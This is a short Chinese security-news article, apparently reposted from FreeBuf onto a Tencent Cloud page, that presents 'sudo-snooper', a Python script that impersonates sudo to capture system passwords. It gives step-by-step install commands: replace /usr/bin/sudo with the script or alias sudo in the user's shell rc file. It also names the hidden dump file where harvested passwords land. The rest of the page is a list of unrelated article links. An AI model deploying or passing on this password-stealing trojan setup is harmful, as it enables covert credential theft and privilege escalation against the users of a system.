sudo-snooper:一款伪装成sudo命令的“蜜罐”脚本

sudo-snooper是一款伪装成sudo命令的“蜜罐”脚本,可以帮助渗透测试人员进行系统密码的获取。

安装步骤

Option 1:在原生sodu的安装位置安装,需要root权限,并把原生sudo程序重命名

# mv /usr/bin/sudo /usr/bin/somename

修改sudo-snooper.py参数

dumpdir = "/tmp/.snooper"dumpfile = "/tmp/.snooper/dump.txt"sudo = 'sudo'

/usr/bin/sudo中安装python文件

# install -dm755 sudo-snooper.py /usr/bin/sudo

给予python执行文件权限

Option 2 – alias sudo命令

在当前用户shell中修改.rc文件(可能是.bashrc .zshrc等)

alias sudo=’python3.5 /path/to/sudo-snooper.py’

使用方式

运行后,伪装的sudo会向用户征询正确的密码,然后你可以在sudo vim /etc/resolv.conf中查看记录下的密码。

下载地址 <点击阅读原文按钮查看>

* 参考来源:GitHub,本文译者:phper,转载请注明来自FreeBuf.COM

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2016-10-22

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏自动化测试实战

Flask第二篇——服务器相关

33480
来自专栏吴伟祥

logging总结 - log4j2使用流程[归档存储]

<web-app> 2.5 以前要多个依赖 log4j-web,还需要在web.xml配置listener、filter

32520
来自专栏jimbochen的专栏

在命令行中调试 django 项目中的模块方法

如果在日常开发中有些模块需要在反复运行调试,但是又依赖了django框架的组件,需要启动框架后才能正常执行,本文提供一个简单可行的方案简化了这个调试过程。

1.2K00
来自专栏云计算教程系列

你的nginx访问过慢?增加个模块吧!

ngx_pagespeed 是nginx web服务器的一个模块,通过安装它你的网站加载速度将会“嗖”的一下上升。

1.1K30
来自专栏上善若水

013android初级篇之Android Studio 引用源码模块,jar及so文件

013android初级篇之Android Studio 引用源码模块,jar及so文件

24920
来自专栏Bug生活2048

Linux下MongoDB实现远程自动备份

既然都备份了,为了保险起见,备份与库就不放在同一台服务器上了,于是向运维申请了一台服务器,同时安装好mongo,如果不知道怎么安装mongo的话可以看我的上一篇...

20420
来自专栏SpringBoot 核心技术

第四章:使用Druid作为SpringBoot项目数据源(添加监控)

52470
来自专栏木头编程 - moTzxx

CentOS6.5 Nginx无法解析php文件

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/u011415782/article/de...

57630
来自专栏Java技术分享

集群分片

 由于复制中,每个数据库都是拥有完整的数据,因此复制的总数据存储量受限于内存最小的数据库节点,如果数据量过大,复制就无能为力了。

25090
来自专栏一个爱瞎折腾的程序猿

在 ubuntu 中愉快的安装 Jenkins

第一次安装的可以稍微看下jenkins 的安装文档 总之,如果没有安装 Java 需要安装一下。

21210

扫码关注云+社区

领取腾讯云代金券